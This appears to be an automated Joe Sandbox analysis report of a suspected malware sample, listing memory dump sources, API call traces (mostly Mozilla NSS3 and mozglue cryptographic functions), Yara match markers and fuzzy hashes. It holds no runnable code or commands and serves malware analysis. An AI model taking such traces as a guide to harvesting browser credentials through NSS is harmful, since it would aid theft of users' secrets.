• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                                                              APIs
Memory Dump Source
• Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3833677464-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009215BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 009215C6
                                                                                                                                                                                                                • Part of subcall function 009215BC: HeapAlloc.KERNEL32(00000000), ref: 009215CD
                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00921606
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0092160C
                                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00921614
                                                                                                                                                                                                              • GetWindowContextHelpId.USER32(00000000), ref: 0092161B
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,00000000), ref: 00921623
                                                                                                                                                                                                              • RegisterClassW.USER32(00000000), ref: 0092162A
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 00921631
                                                                                                                                                                                                              • ConvertDefaultLocale.KERNEL32(00000000), ref: 00921638
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00921644
                                                                                                                                                                                                              • IsDialogMessageW.USER32(00000000,00000000), ref: 0092164C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00921656
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092165D
Memory Dump Source
• Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3627164727-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7CE0
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7D36
                                                                                                                                                                                                              • PR_Realloc.NSS3(?,00000080), ref: 6CBD7D6D
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7D8B
                                                                                                                                                                                                              • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CBD7DC2
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7DD8
                                                                                                                                                                                                              • malloc.MOZGLUE(00000080), ref: 6CBD7DF8
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7E06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                              • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                              • API String ID: 530461531-3274975309
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CB0DE64), ref: 6CB0ED0C
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0ED22
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB0ED4A
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB0ED6B
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB0ED38
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CB0ED52
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CB0ED83
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB0ED95
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB0ED9D
                                                                                                                                                                                                                • Part of subcall function 6CB264F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CB2127C,00000000,00000000,00000000), ref: 6CB2650E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Aborting,?,6CAB2357), ref: 6CBD0EB8
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CAB2357), ref: 6CBD0EC0
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBD0EE6
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_Now.NSS3 ref: 6CBD0A22
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBD0A35
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBD0A66
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_GetCurrentThread.NSS3 ref: 6CBD0A70
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBD0A9D
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBD0AC8
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBD0AE8
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBD0B19
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBD0B48
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBD0C76
                                                                                                                                                                                                                • Part of subcall function 6CBD09D0: PR_LogFlush.NSS3 ref: 6CBD0C7E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBD0EFA
                                                                                                                                                                                                                • Part of subcall function 6CABAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CABAF0E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F16
                                                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F1C
                                                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F25
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                              • API String ID: 3905088656-1374795319
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6CB34DCB
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB34DE1
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB34DFF
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB34E59
                                                                                                                                                                                                                • Part of subcall function 6CB1FAB0: free.MOZGLUE(?,-00000001,?,?,6CABF673,00000000,00000000), ref: 6CB1FAC7
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBF300C,00000000), ref: 6CB34EB8
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CB34EFF
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB34F56
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB3521A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1025791883-0
                                                                                                                                                                                                              • Opcode ID: 88a3c9f4a34e070204b4607ec2ab2e86bcc36915934771468c92024b348b3de0
                                                                                                                                                                                                              • Instruction ID: 0bfaf4bbb915dbfd24a2eaf962588ea16e36457d2a13978107360a93af37ff59
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88a3c9f4a34e070204b4607ec2ab2e86bcc36915934771468c92024b348b3de0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF19C71E00259CBDB08CF58D8407AEBBB2FF44358F254169E819AB780E736E985CF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6CB32C2A), ref: 6CB30C81
                                                                                                                                                                                                                • Part of subcall function 6CB1BE30: SECOID_FindOID_Util.NSS3(6CAD311B,00000000,?,6CAD311B,?), ref: 6CB1BE44
                                                                                                                                                                                                                • Part of subcall function 6CB08500: SECOID_GetAlgorithmTag_Util.NSS3(6CB095DC,00000000,00000000,00000000,?,6CB095DC,00000000,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB08517
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30CC4
                                                                                                                                                                                                                • Part of subcall function 6CB1FAB0: free.MOZGLUE(?,-00000001,?,?,6CABF673,00000000,00000000), ref: 6CB1FAC7
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB30CD5
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB30D1D
                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB30D3B
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB30D7D
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB30DB5
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30DC1
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB30DF7
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB30E05
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB30E0F
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB095E0
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CB095F5
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CB09609
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB0961D
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetInternalSlot.NSS3 ref: 6CB0970B
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB09756
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: PK11_GetIVLength.NSS3(?), ref: 6CB09767
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB0977E
                                                                                                                                                                                                                • Part of subcall function 6CB095C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB0978E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3136566230-0
                                                                                                                                                                                                              • Opcode ID: 79e264dc716c52849ffa5a9d53f2f60805e75389e989859b8c2da794b51be01e
                                                                                                                                                                                                              • Instruction ID: 97dfaa536aa659f7b6ed334e4a320f735adb15f0b1751166b9d824d06c56121b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79e264dc716c52849ffa5a9d53f2f60805e75389e989859b8c2da794b51be01e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B741B3B19012A5ABEB019F65EC45BAF7AB4EF4430CF100024ED1957B41EB35EA58CBE2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CADFCBD
                                                                                                                                                                                                              • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CADFCCC
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CADFCEF
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CADFD32
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CADFD46
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000001), ref: 6CADFD51
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CADFD6D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CADFD84
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                              • API String ID: 183580322-336475711
                                                                                                                                                                                                              • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                              • Instruction ID: f1fcf79f773b74f635fe2d7646853e999ee332332fc7ab88520aadf41f765eb6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31C2B69012559BEB008EA4EC057AFB7A8AF5435CF1A0129DC54A7B00E771F958C7D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6CAC7D8F,6CAC7D8F,?,?), ref: 6CAC6DC8
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB1FE08
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB1FE1D
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB1FE62
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CAC7D8F,?,?), ref: 6CAC6DD5
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FA0,00000000,?,?,?,?,6CAC7D8F,?,?), ref: 6CAC6DF7
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAC6E35
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB1FE29
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB1FE3D
                                                                                                                                                                                                                • Part of subcall function 6CB1FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CB1FE6F
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAC6E4C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FE0,00000000), ref: 6CAC6E82
                                                                                                                                                                                                                • Part of subcall function 6CAC6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CACB21D,00000000,00000000,6CACB219,?,6CAC6BFB,00000000,?,00000000,00000000,?,?,?,6CACB21D), ref: 6CAC6B01
                                                                                                                                                                                                                • Part of subcall function 6CAC6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CAC6B8A
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAC6F1E
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAC6F35
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBE8FE0,00000000), ref: 6CAC6F6B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6CAC7D8F,?,?), ref: 6CAC6FE1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
